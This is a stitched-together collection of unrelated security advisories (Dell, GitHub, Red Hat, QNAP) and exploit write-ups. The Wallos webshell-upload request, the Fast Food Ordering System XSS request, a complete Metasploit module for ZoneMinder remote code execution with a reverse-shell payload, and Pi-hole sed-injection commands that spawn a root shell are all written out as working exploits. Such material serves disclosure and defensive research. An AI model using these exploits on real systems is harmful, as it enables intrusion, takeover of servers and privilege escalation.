
Dell Digital Delivery versions prior to 5.0.82.0 contain an Insecure Operation on Windows Junction / Mount Point vulnerability. A local malicious user could potentially exploit this vulnerability to create arbitrary folder leading to permanent Denial of Service (DOS).



**Article Content**

**Impact**

Medium

**Details**

Proprietary Code CVEs

Description

CVSS Base Score

CVSS Vector String

CVE-2023-32470

Dell Digital Delivery versions prior to 5.0.82.0 contain an Insecure Operation on Windows Junction / Mount Point vulnerability. A local malicious user could potentially exploit this vulnerability to create arbitrary folder leading to permanent Denial of Service (DOS).

5.0

CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H  
 

Proprietary Code CVEs

Description

CVSS Base Score

CVSS Vector String

CVE-2023-32470

Dell Digital Delivery versions prior to 5.0.82.0 contain an Insecure Operation on Windows Junction / Mount Point vulnerability. A local malicious user could potentially exploit this vulnerability to create arbitrary folder leading to permanent Denial of Service (DOS).

5.0

CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H  
 

Dell Technologies recommends all customers consider both the CVSS base score and any relevant temporal and environmental scores that may impact the potential severity associated with a particular security vulnerability.

**Affected Products and Remediation**

Product

Software/Firmware

Affected Versions

Remediated Versions

Link

Dell Digital Delivery

Software

Versions prior to 5.0.82.0

Version 5.0.82.0

https://www.dell.com/support/kbdoc/000192053/how-to-download-and-install-dell-digital-delivery

Product

Software/Firmware

Affected Versions

Remediated Versions

Link

Dell Digital Delivery

Software

Versions prior to 5.0.82.0

Version 5.0.82.0

https://www.dell.com/support/kbdoc/000192053/how-to-download-and-install-dell-digital-delivery

**Revision History**

Revision

Date

Description

1.0

2023-09-07

Initial Release

**Related Information**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

**Article Properties**

**Affected Product**

Alienware 15 R2, Alienware 17 R3, Alienware Area-51 Threadripper Edition R3 and R6, Alienware Area-51 R4 and R5, Alienware Area-51 Threadripper Edition R7, Alienware Area-51m R2, Alienware Aurora Ryzen Edition R10, Alienware Aurora R11 , Alienware Aurora R12, Alienware Aurora R6, Alienware Aurora R7, Alienware Aurora R8, Alienware Aurora R9, Alienware M15, Alienware M15 R3, Alienware m15 R4, Alienware M17 R3, Alienware m17 R4, Alienware x15 R1, Alienware x15 R2, Alienware x17 R1, Alienware x17 R2, Alienware 13, Dell G3 15 3500, Dell G3 3579, Dell G3 15 3590, Dell G5 15 5500, Dell G5 SE 5505, Dell G5 15 5587, Dell G5 15 5590, Dell G7 15 7588, Dell G7 15 7590, Dell G3 3779, Inspiron 11 3179, Inspiron 3195 2-in-1, Inspiron 13 5310, Inspiron 13 5378 2-in-1, Inspiron 13 5379 2-in-1, Inspiron 5390, Inspiron 5391, Inspiron 7300 2-in-1, Inspiron 7306 2-in-1, Inspiron 7370, Inspiron 7373 2-in-1, Inspiron 13 7375 2-in-1, Inspiron 13 7378 2-in-1, Inspiron 7380, Inspiron 7391 2-in-1, Inspiron 7391, Inspiron 14 3473, Inspiron 14 3476, Inspiron 3480, Inspiron 3481, Inspiron 3482, Inspiron 3490, Inspiron 3493, Inspiron 5400 2-in-1, Inspiron 5406 2-in-1, Inspiron 14 5410/5418, Inspiron 5415, Inspiron 5480, Inspiron 5481 2-in-1, Inspiron 5482 2-in-1, Inspiron 14 5485 2-in-1, Inspiron 5488, Inspiron 5491 2-in-1, Inspiron 5493, Inspiron 5494, Inspiron 7405 2-in-1, Inspiron 14 Gaming 7467, Inspiron 7472, Inspiron 3501, Inspiron 3502, Inspiron 3505, Inspiron 15 3573, Inspiron 15 3576, Inspiron 3580, Inspiron 3581, Inspiron 3582, Inspiron 3583, Inspiron 3585, Inspiron 3590, Inspiron 3593, Inspiron 15 5510/5518, Inspiron 5515, Inspiron 15 5566, Inspiron 5570, Inspiron 15 5578 2-in-1, Inspiron 15 5579 2-in-1, Inspiron 5580, Inspiron 15 5582 2-in-1, Inspiron 15 5583, Inspiron 15 5584, Inspiron 5593, Inspiron 5594, Inspiron 7500 2-in-1 Black, Inspiron 7500 2-in-1 Silver, Inspiron 7500, Inspiron 7501, Inspiron 7506 2-in-1, Inspiron 15 7510, Inspiron 15 Gaming 7567, Inspiron 15 7569 2-in-1, Inspiron 7570, Inspiron 15 7572, Inspiron 7573 2-in-1, Inspiron 15 Gaming 7577, Inspiron 15 7579 2-in-1, Inspiron 7580, Inspiron 7586 2-in-1, Inspiron 7590, Inspiron 16 7610, Inspiron 3780, Inspiron 3781, Inspiron 3782, Inspiron 3785, Inspiron 3790, Inspiron 3793, Inspiron 5770, Inspiron 7706 2-in-1, Inspiron 17 7773 2-in-1, Inspiron 7786 2-in-1, Inspiron 3275, Inspiron 3277, Inspiron 3280 AIO, Inspiron 3475, Inspiron 3477, Inspiron 3480 AIO, Inspiron 5477, Inspiron 7777, Inspiron 3671, Inspiron 3880, Inspiron 3881, Inspiron 5675, Inspiron 5676, Latitude 3180, Latitude 3190, Latitude 5290 2-in-1, Latitude 7200 2-in-1, Latitude 7210 2-in-1, Latitude 7212 Rugged Extreme Tablet, Latitude 7214 Rugged Extreme, Latitude 7220EX Rugged Extreme Tablet, Latitude 7220 Rugged Extreme Tablet, Latitude 7230 Rugged Extreme Tablet, Latitude 7290, Latitude 3310 2-in-1, Latitude 3310, Latitude 3330, Latitude 13 3379 2-in-1, Latitude 3390 2-in-1, Latitude 5300, Latitude 5310 2-in-1, Latitude 5310, Latitude 5320, Latitude 5330, Latitude 7320, Latitude 7320 Detachable, Latitude 7330, Latitude 7380, Latitude 7389 2-in-1, Latitude 7390 2-in-1, Latitude 7390, Latitude 3400, Latitude 3410, Latitude 3420, Latitude 3430, Latitude 3490, Latitude 5400, Latitude 5401, Latitude 5410, Latitude 5411, Latitude 5414 Rugged, Latitude 5421, Latitude 5431, Latitude 5490, Latitude 7400 2-in-1, Latitude 7420, Latitude 7430, Latitude 7490, Latitude 3500, Latitude 3510, Latitude 3520, Latitude 3530, Latitude 3590, Latitude 5500, Latitude 5501, Latitude 5510, Latitude 5511, Latitude 5520, Latitude 5521, Latitude 5530, Latitude 5531, Latitude 5590, Latitude 5591, Latitude 7520, Latitude 7530, Latitude 9510, Latitude 9520, Latitude 5420, Latitude 5430, OptiPlex 5055 Tower, OptiPlex 5055 A Series Small Form Factor, OptiPlex 5055 Ryzen CPU Tower, OptiPlex 5055 Ryzen Small Form Factor, OptiPlex Tower 7010, OptiPlex Micro 7010, OptiPlex Tower Plus 7010, OptiPlex Micro Plus 7010, OptiPlex Small Form Factor Plus 7010, OptiPlex Small Form Factor 7010, OptiPlex All-in-One 7410, Precision 3630 XL Tower, 7820 XL Tower, Precision 3541, Precision 7530, Precision 7540, Precision 7730, Precision 7740, Precision 3630 Tower, Precision 7820 Tower, Vostro 5370, Vostro 5391, Vostro 3481, Vostro 5471, Vostro 3572, Vostro 3580, Vostro 3581, Vostro 3583, Vostro 3584, Vostro 3590, Vostro 7500, Vostro 15 7570, Vostro 3681 ...

**Last Published Date**

07 Sep 2023

**Version**

1

**Article Type**

Dell Security Advisory

CVE-2023-32470: DSA-2023-224: Security Update for a Dell Digital Delivery Service Vulnerability

Wallos versions prior to 1.11.2 suffer from a remote shell upload vulnerability.

# Exploit Title: Wallos - File Upload RCE (Authenticated)  
# Date: 2024-03-04  
# Exploit Author: sml@lacashita.com  
# Vendor Homepage: https://github.com/ellite/Wallos  
# Software Link: https://github.com/ellite/Wallos  
# Version: < 1.11.2  
# Tested on: Debian 12

Wallos allows you to upload an image/logo when you create a new subscription.  
This can be bypassed to upload a malicious .php file.

POC  
---

1) Log into the application.  
2) Go to "New Subscription"  
3) Upload Logo and choose your webshell .php  
4) Make the Request changing Content-Type to image/jpeg and adding "GIF89a", it should be like:

--- SNIP -----------------

POST /endpoints/subscription/add.php HTTP/1.1

Host: 192.168.1.44

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://192.168.1.44/

Content-Type: multipart/form-data; boundary=---------------------------29251442139477260933920738324

Origin: http://192.168.1.44

Content-Length: 7220

Connection: close

Cookie: theme=light; language=en; PHPSESSID=6a3e5adc1b74b0f1870bbfceb16cda4b; theme=light

-----------------------------29251442139477260933920738324

Content-Disposition: form-data; name="name"

test

-----------------------------29251442139477260933920738324

Content-Disposition: form-data; name="logo"; filename="revshell.php"

Content-Type: image/jpeg

GIF89a;

<?php  
system($_GET['cmd']);  
?> 

-----------------------------29251442139477260933920738324

Content-Disposition: form-data; name="logo-url"

----- SNIP -----

5) You will get the response that your file was uploaded ok:

{"status":"Success","message":"Subscription updated successfully"}

6) Your file will be located in:   
http://VICTIM_IP/images/uploads/logos/XXXXXX-yourshell.php

Wallos Shell Upload

All versions of package git-clone are vulnerable to Command Injection due to insecure usage of the --upload-pack feature of git.

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2022-25900

**Command injection in git-clone**

High severity GitHub Reviewed Published Jul 2, 2022 • Updated Jul 6, 2022

We are still processing this advisory. You may have affected repositories that are not yet on this list. Check back soon for more.

**Package**

npm git-clone (npm)

**Affected versions**

<= 0.2.0

**Description**

GHSA-8jmw-wjr8-2x66: Command injection in git-clone

Exposure of Sensitive Information to an Unauthorized Actor via hostname confusion in GitHub repository ionicabizau/parse-url prior to 6.0.1

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2022-0722

**Hostname confusion in parse-url**

Moderate severity GitHub Reviewed Published Jun 28, 2022 • Updated Jul 5, 2022

We are still processing this advisory. You may have affected repositories that are not yet on this list. Check back soon for more.

**Package**

npm parse-url (npm)

**Affected versions**

< 6.0.1

**Description**

GHSA-4p35-cfcx-8653: Hostname confusion in parse-url

An Authenticated Remote Code Exection (RCE) vulnerability exists in Xerte through 3.9 in website_code/php/import/fileupload.php by uploading a maliciously crafted PHP file though the project interface disguised as a language file to bypasses the upload filters. Attackers can manipulate the files destination by abusing path traversal in the 'mediapath' variable.

@@ -72,7 +72,7 @@ function sanitizeName($file, &$response)

}

  

// Check upload path, should contain USER-FILES

if (strpos($\_REQUEST\['uploadURL'\], 'USER-FILES') === false)

if (strpos($\_REQUEST\['uploadPath'\], 'USER-FILES') === false || strpos($\_REQUEST\['uploadPath'\], '../') !== false || strpos($\_REQUEST\['uploadURL'\], 'USER-FILES') === false)

{

// Invalid folder, reject!

$response\->uploaded = 0;

CVE-2021-44664: Prohibit path traversal on upload · thexerteproject/xerteonlinetoolkits@6daeb81

Red Hat Security Advisory 2023-0607-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.7.1.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2023:0607-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0607  
Issue date:        2023-02-06  
CVE Names:         CVE-2023-0430   
=====================================================================

1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.7.1.

Security Fix(es):

* Mozilla: Revocation status of S/Mime signature certificates was not  
checked (CVE-2023-0430)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2166591 - CVE-2023-0430 Mozilla: Revocation status of S/Mime signature certificates was not checked

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

Source:  
thunderbird-102.7.1-2.el9_0.src.rpm

aarch64:  
thunderbird-102.7.1-2.el9_0.aarch64.rpm  
thunderbird-debuginfo-102.7.1-2.el9_0.aarch64.rpm  
thunderbird-debugsource-102.7.1-2.el9_0.aarch64.rpm

ppc64le:  
thunderbird-102.7.1-2.el9_0.ppc64le.rpm  
thunderbird-debuginfo-102.7.1-2.el9_0.ppc64le.rpm  
thunderbird-debugsource-102.7.1-2.el9_0.ppc64le.rpm

s390x:  
thunderbird-102.7.1-2.el9_0.s390x.rpm  
thunderbird-debuginfo-102.7.1-2.el9_0.s390x.rpm  
thunderbird-debugsource-102.7.1-2.el9_0.s390x.rpm

x86_64:  
thunderbird-102.7.1-2.el9_0.x86_64.rpm  
thunderbird-debuginfo-102.7.1-2.el9_0.x86_64.rpm  
thunderbird-debugsource-102.7.1-2.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-0430  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY+FwbdzjgjWX9erEAQiQ2w//aDhDXvy705zfahihbsX+b4kbTIhAtlX2  
YJ7PbJdXMsWC5VhzN7ZXUoVYH+WfalnJISq/j63gkF7BU2EriQ9chkJJvfbdUHF2  
chmBQjKVRq2q2jqb11qVq3xdskvmzhP7krATeizJsIQo1YmySzZW+3GyQKRaNdhY  
R7BRw/GBmwIJVlt4+FSdDvv142Ls7EOeliUlW4HW7+/mfUH2Ozb8XimESSqj3526  
ZCIXbp0j3wFOvI0KIE3UoKFj06BJDgFpM3c7ezVXUUH6D5ySHeRIQ60l2nY+DKj3  
Vf79xoujEhREA/b2AMpRKPcCmB2MGfE7hcAJxfe6t8ZM4MwG9oTu/aigJtJMyG0K  
HCGRRLigl8BulHKmNMpUvxnhh8xvcu2+V7dcvObEnKjmEh7Oi+W/kPKTEI5qWXde  
vmUlb0MzftKnnWxhEyJvFQ6OGL/EzrB7kSiLwuuhMHfmXgx50rz8v8RHwARVitKU  
XABucP5baAYQuWuo+MMEcO3jk4pteHhApFFa3b3XzY1j39zDz3k+oOLhAxDpu8Fk  
OKfzKXX5egyasXykazEZj/nPcsXqb80HO2jW1/GSVvbKAOs9qoUwsI6Q4koG8nGV  
QvSVpzet6Ut0yNe7RsEFw5h134/Hqw2vhyjZxuByZwh3ORgnz8fS185JqvZU6PTI  
xMjIdb+1P/A=  
=tER8  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0607-01

A cross-site scripting (XSS) vulnerability has been reported to affect QNAP device running Proxy Server. If exploited, this vulnerability allows remote attackers to inject malicious code.
We have already fixed this vulnerability in the following versions of Proxy Server:
QTS 4.5.x: Proxy Server 1.4.2 ( 2021/12/30 ) and later


<< Back to Security Advisory List

*   **Release date:** February 25, 2022
*   **Security ID:** QSA-22-04
*   **Severity:** Medium
*   **CVE identifier:** CVE-2021-34359 | CVE-2021-34361
*   **Affected products:** QNAP NAS running Proxy Server
*   **Status:** Resolved

**Summary**

Cross-site scripting (XSS) vulnerabilities have been reported to affect QNAP NAS running Proxy Server. If exploited, this vulnerability allows remote attackers to inject malicious code.

We have already fixed this vulnerability in the following versions of Proxy Server:

*   QTS 4.5.x: Proxy Server 1.4.2 (2021/12/30) and later

**Recommendation**

To fix the vulnerabilities, we recommend updating Proxy Server to the latest version.

**Updating Proxy Server**

1.  Log on to QTS as administrator.
2.  Open the **App Center** and then click ![](https://www.qnap.com/i/_upload/support/images/magnifier.png).  
    A search box appears.
3.  Enter "Proxy Server".  
    Proxy Server appears in the search results.
4.  Click **Update**.  
    A confirmation message appears.  
    **Note:** The **Update** button is not available if your application is already up to date.
5.  Click **OK**.  
    The application is updated.

**Acknowledgements:** Tony Martin, a security researcher

**Revision History:** V1.0 (February 25, 2022) - Published

CVE-2021-34361: XSS Vulnerabilities in Proxy Server - Security Advisory

Fast Food Ordering System v1.0 was discovered to contain a persistent cross-site scripting (XSS) vulnerability via the component /ffos/classes/Master.php?f=save_category.

    ## Title: Fast Food Ordering System 1.0 Stored Cross-Site Scripting## Author: Ashish Kumar## Date: 05.31.2022## Vendor: https://www.sourcecodester.com/users/tips23## Software:https://www.sourcecodester.com/php/15366/fast-food-ordering-system-phpoop-free-source-code.html## Reference:https://medium.com/@cyberthoth/fast-food-ordering-system-1-0-cross-site-scripting-7927f4b1edd6#Description：#The Line 255 of Master.php sends unvalidated data to a web browser, whichcan result in the browser executing malicious code.#echo $Master->save_category();#PoC：POST /ffos/classes/Master.php?f=save_category HTTP/1.1Host: localhostContent-Length: 480sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"Accept: application/json, text/javascript, */*; q=0.01Content-Type: multipart/form-data;boundary=----WebKitFormBoundarySmYVeqOBMhcSziZMX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36sec-ch-ua-platform: "Windows"Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/ffos/admin/?page=categoriesAccept-Encoding: gzip, deflateAccept-Language: en-GB,en-US;q=0.9,en;q=0.8Cookie: PHPSESSID=junl7tbvb7hvrdeq776aislbcjConnection: close------WebKitFormBoundarySmYVeqOBMhcSziZMContent-Disposition: form-data; name="id"10------WebKitFormBoundarySmYVeqOBMhcSziZMContent-Disposition: form-data; name="name"XSS------WebKitFormBoundarySmYVeqOBMhcSziZMContent-Disposition: form-data; name="description"Testing XSS "><img src="" onerror="alert(document.cookie)">------WebKitFormBoundarySmYVeqOBMhcSziZMContent-Disposition: form-data; name="status"1------WebKitFormBoundarySmYVeqOBMhcSziZM--

CVE-2022-32318: Fast Food Ordering System 1.0 Cross Site Scripting ≈ Packet Storm

This Metasploit module exploits an arbitrary file write in the debug log file option chained with a path traversal in the language settings that leads to remote code execution in ZoneMinder surveillance software versions before 1.36.13 and before 1.37.11

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'ZoneMinder Language Settings Remote Code Execution',        'Description' => %q{          This module exploits arbitrary file write in debug log file option          chained with a path traversal in language settings that leads to a          remote code execution in ZoneMinder surveillance software versions          before 1.36.13 and before 1.37.11        },        'License' => MSF_LICENSE,        'Author' => [ 'krastanoel' ], # Discovery and exploit        'References' => [          [ 'CVE', '2022-29806' ],          [ 'URL', 'https://krastanoel.com/cve/2022-29806']        ],        'Platform' => ['php'],        'Privileged' => false,        'Arch' => ARCH_PHP,        'Targets' => [          [ 'Automatic Target', {}]        ],        'DisclosureDate' => '2022-04-27',        'DefaultTarget' => 0,        'DefaultOptions' => {          'Payload' => 'php/reverse_perl',          'Encoder' => 'php/base64'        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options([      OptString.new('USERNAME', [true, 'The ZoneMinder username', 'admin']),      OptString.new('PASSWORD', [true, 'The ZoneMinder password', 'admin']),      OptString.new('TARGETURI', [true, 'The ZoneMinder path', '/zm/'])    ])  end  def check    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, '/index.php'),      'method' => 'GET'    )    return Exploit::CheckCode::Unknown('No response from the web service') if res.nil?    return Exploit::CheckCode::Safe("Check TARGETURI - unexpected HTTP response code: #{res.code}") if res.code != 200    if res.body =~ /ZoneMinder/      csrf_magic = get_csrf_magic(res)      res = authenticate(csrf_magic) if res.body =~ /ZoneMinder Login/      return Exploit::CheckCode::Safe('Authentication failed') if res.body =~ %r{<title>ZM - Login</title>}      res = send_request_cgi(        'uri' => normalize_uri(target_uri.path, '/index.php'),        'method' => 'GET',        'keep_cookies' => true      )    else      return Exploit::CheckCode::Safe('Target is not a ZoneMinder web server')    end    res.body.match(/v(1.\d+.\d+)/)    version = Regexp.last_match(1)    unless version      return Exploit::CheckCode::Safe('Unable to determine ZoneMinder version')    end    version = Rex::Version.new(version)    return Exploit::CheckCode::Appears("Version Detected: #{version}") if version <= Rex::Version.new('1.37.10')    Exploit::CheckCode::Safe("Version Detected: #{version}")  rescue ::Rex::ConnectionError    return Exploit::CheckCode::Unknown('Could not connect to the web service')  end  def exploit    unless datastore['AutoCheck']      cookie_jar.clear      res = authenticate      fail_with(Failure::NoAccess, 'Authentication failed') if res&.body =~ %r{<title>ZM - Login</title>}    end    vprint_status('Leak installation directory path')    random_path = rand_text_alphanumeric(6..15)    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, '/index.php'),      'method' => 'GET',      'keep_cookies' => true,      'vars_get' => { 'view' => random_path }    )    fail_with(Failure::UnexpectedReply, 'Failed to leak install path') unless res    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, '/index.php'),      'method' => 'GET',      'keep_cookies' => true,      'vars_get' => { 'view' => 'options' }    )    csrf_magic = get_csrf_magic(res)    current_lang = res&.get_html_document&.at(      'select[@name="newConfig[ZM_LANG_DEFAULT]"]        option[@selected="selected"]'    )&.text    fail_with(Failure::UnexpectedReply, 'Unable to get current language') if res.nil? || current_lang.nil?    data = 'view=request&request=log&task=query&limit=10'    data += "&__csrf_magic=#{csrf_magic}" if csrf_magic    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/index.php'),      'data' => data.to_s,      'keep_cookies' => true    )    fail_with(Failure::UnexpectedReply, 'Unable to get valid JSON response') if res.nil? || res&.body.blank?    res.body.match(/(\{"result":.*})/)    request_log = JSON.parse(Regexp.last_match(1)).with_indifferent_access    if request_log.key?(:rows) # Check for latest version key first v1.36.x      request_log_key = 'rows'    elsif request_log.key?(:logs)      request_log_key = 'logs'    else      fail_with(Failure::UnexpectedReply, 'Service found, but unable to find request log key')    end    request_log = request_log[request_log_key].select { |e| e['Message'] =~ /'#{random_path}'/ }.first    if request_log      path = request_log['File'].split('/')[0..-2].join('/')      vprint_good("Path: #{path}")    else      fail_with(Failure::UnexpectedReply, 'Service found, but unable to leak installation directory path')    end    fname = "#{rand_text_alphanumeric(6..15)}.php"    traverse_path = "#{path}/lang".split('/')[1..].map { '../' }.join    shell = "#{traverse_path}tmp/#{fname}"    data = "view=options&tab=logging&action=options&newConfig[ZM_LOG_DEBUG]=1&newConfig[ZM_LOG_DEBUG_FILE]=#{shell}"    data += "&__csrf_magic=#{csrf_magic}" if csrf_magic    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/index.php'),      'data' => data.to_s,      'keep_cookies' => true    )    fail_with(Failure::UnexpectedReply, 'Unable to set LOG_DEBUG_FILE option') if res.nil? || res&.code != 302    vprint_good("Shell: #{shell}")    p = %(<?php #{payload.encoded} ?>)    data = "view=request&request=log&task=create&level=ERR&message=#{p}&file=#{shell}"    data += "&__csrf_magic=#{csrf_magic}" if csrf_magic    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/index.php'),      'data' => data.to_s,      'keep_cookies' => true    )    fail_with(Failure::UnexpectedReply, 'Failed to receive a response') unless res    result = JSON.parse(res.body)['result']    fail_with(Failure::UnexpectedReply, 'Failed to write payload') unless result    fail_with(Failure::UnexpectedReply, 'Unable to write payload to LOG_DEBUG_FILE') if result != 'Ok'    # trigger the shell    lang = shell.gsub(/\.php/, '')    data = "view=options&tab=system&action=options&newConfig[ZM_LANG_DEFAULT]=#{lang}"    data += "&__csrf_magic=#{csrf_magic}" if csrf_magic    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/index.php'),      'data' => data.to_s,      'keep_cookies' => true    )    fail_with(Failure::UnexpectedReply, 'Unable to trigger the payload') if res.nil? || res&.code != 302    # cleanup    data = Rack::Utils.parse_nested_query(data)    data['newConfig']['ZM_LANG_DEFAULT'] = current_lang    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/index.php'),      'data' => data.to_query,      'keep_cookies' => true    )    vprint_warning('Unable to reset language to default') if res.nil? || res&.code != 200    data['tab'] = 'logging'    data['newConfig']['ZM_LOG_DEBUG'] = 0    data['newConfig']['ZM_LOG_DEBUG_FILE'] = ''    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/index.php'),      'data' => data.to_query,      'keep_cookies' => true    )    vprint_warning('Unable to reset debug option') if res.nil? || res&.code != 302  rescue ::Rex::ConnectionError    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")  end  private  def get_csrf_magic(res)    return if res.nil?    res.get_html_document.at('//input[@name="__csrf_magic"]/@value')&.text  end  def authenticate(csrf_magic = nil)    username = datastore['USERNAME']    password = datastore['PASSWORD']    data = "action=login&view=login&username=#{username}&password=#{password}"    data += "&__csrf_magic=#{csrf_magic}" if csrf_magic    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/index.php'),      'data' => data.to_s,      'keep_cookies' => true    })  endend

ZoneMinder Language Settings Remote Code Execution

Pi-hole is a Linux network-level advertisement and Internet tracker blocking application. Multiple privilege escalation vulnerabilities were discovered in version 5.2.4 of Pi-hole core. See the referenced GitHub security advisory for details.

Hello,

During a security assessment of the Pihole product, I found three privilege escalation vulnerabilities on the latest version: 5.2.4.

These vulnerabilities allow attackers with a low privilege shell to elevate their privileges to the root user.

In order to mitigate these vulnerabilities, a strict validation of the user’s input before being used in the sed command should be implemented.

Here the details of the 3 privilege escalation vulnerabilities I found:

**1st Privilege Escalation**

This exploit works only if the file /etc/dnsmasq.d/05-pihole-custom-cname.conf is not empty.

Showing that the current user is www-data (it is possible to use any other low-privilege user with the same sudo configuration as the www-data user):

The file 05-pihole-custom-cname.conf does not exist:

    $ ls -l /etc/dnsmasq.d/05-pihole-custom-cname.conf
    
    ls: cannot access '/etc/dnsmasq.d/05-pihole-custom-cname.conf': No such file or directory
    

Add a fake entry inside the file 05-pihole-custom-cname.conf:

    $ sudo /usr/local/bin/pihole -a addcustomcname 'mydomain.com' 'mydomain.com'
    
      [✓] Adding custom CNAME record...
    
      [✓] Restarting DNS server
    

Check if the entry has been added to the file:

    $ cat /etc/dnsmasq.d/05-pihole-custom-cname.conf
    
    cname=mydomain.com,mydomain.com
    
    

Run the pihole script using the malicious payload to spawn a root shell:

    $ sudo /usr/local/bin/pihole -a removecustomcname 'a/d ; 1e exec sh 1>&0 ; /'
    
      [✓] Removing custom CNAME record...
    
    # id
    
    uid=0(root) gid=0(root) groups=0(root)
    

The security issue resides in the RemoveCustomCNAMERecord function of the /opt/pihole/webpage.sh where the domain and target variables are taken from the input and not validated before being used in the sed command:

    RemoveCustomCNAMERecord() {
    
        echo -e "  ${TICK} Removing custom CNAME record..."
    
     
    
        domain="${args[2]}"
    
        target="${args[3]}"
    
        sed -i "/cname=${domain},${target}/d" "${dnscustomcnamefile}"
    
     
    
        # Restart dnsmasq to update removed custom CNAME records
    
        RestartDNS
    
    }
    
     
    
    [CUT BY COMPASS]
    
     
    
    main() {
    
        args=("$@")
    
     
    
        case "${args[1]}" in
    
    [CUT BY COMPASS]
    
            "addcustomdns"        ) AddCustomDNSAddress;;
    
            "removecustomdns"     ) RemoveCustomDNSAddress;;
    
            "addcustomcname"      ) AddCustomCNAMERecord;;
    
            "removecustomcname"   ) RemoveCustomCNAMERecord;;
    
            *                     ) helpFunc;;
    
        esac
    

The payload a/d ; 1e exec sh 1>&0 ; / is used to add multiple sed expressions. One of the injected sed expressions (the red one) is used to spawn a new shell:

    sed -i "/cname= a/d ; 1e exec sh 1>&0 ; /,/d" "${dnscustomcnamefile}"
    

**2nd Privilege Escalation**

The same vulnerability is present in the removecustomdns option. This exploit works only if the file /etc/pihole/custom.list is not empty.

Showing that the current user is www-data (it is possible to use any other low-privilege user with the same sudo configuration as the www-data user):

The file custom.list is empty:

    $ ls -l /etc/pihole/custom.list
    
    -rw-r--r-- 1 root root 0 Feb 23 05:38 /etc/pihole/custom.list
    
    $ cat /etc/pihole/custom.list
    

Add a fake entry inside the file custom.list:

    $ sudo /usr/local/bin/pihole -a addcustomdns '8.8.8.8' 'google.com'
    
      [✓] Adding custom DNS entry...
    
      [✓] Restarting DNS server
    

Check if the entry has been added to the file:

    $ cat /etc/pihole/custom.list
    
    8.8.8.8 google.com
    

Run the pihole script using the malicious payload to spawn a root shell:

    $ sudo /usr/local/bin/pihole -a removecustomdns 'a/d ; 1e exec sh 1>&0 ; /'
    
      [✓] Removing custom DNS entry...
    
    # id
    
    uid=0(root) gid=0(root) groups=0(root)
    

The security issue resides in the RemoveCustomDNSAddress function of the /opt/pihole/webpage.sh where the IP and host variables are taken from the input and not validated before being used in the sed command:

    RemoveCustomDNSAddress() {
    
        echo -e "  ${TICK} Removing custom DNS entry..."
    
     
    
        ip="${args[2]}"
    
        host="${args[3]}"
    
        sed -i "/${ip} ${host}/d" "${dnscustomfile}"
    
     
    
        # Restart dnsmasq to update removed custom DNS entries
    
        RestartDNS
    
    }
    
     
    
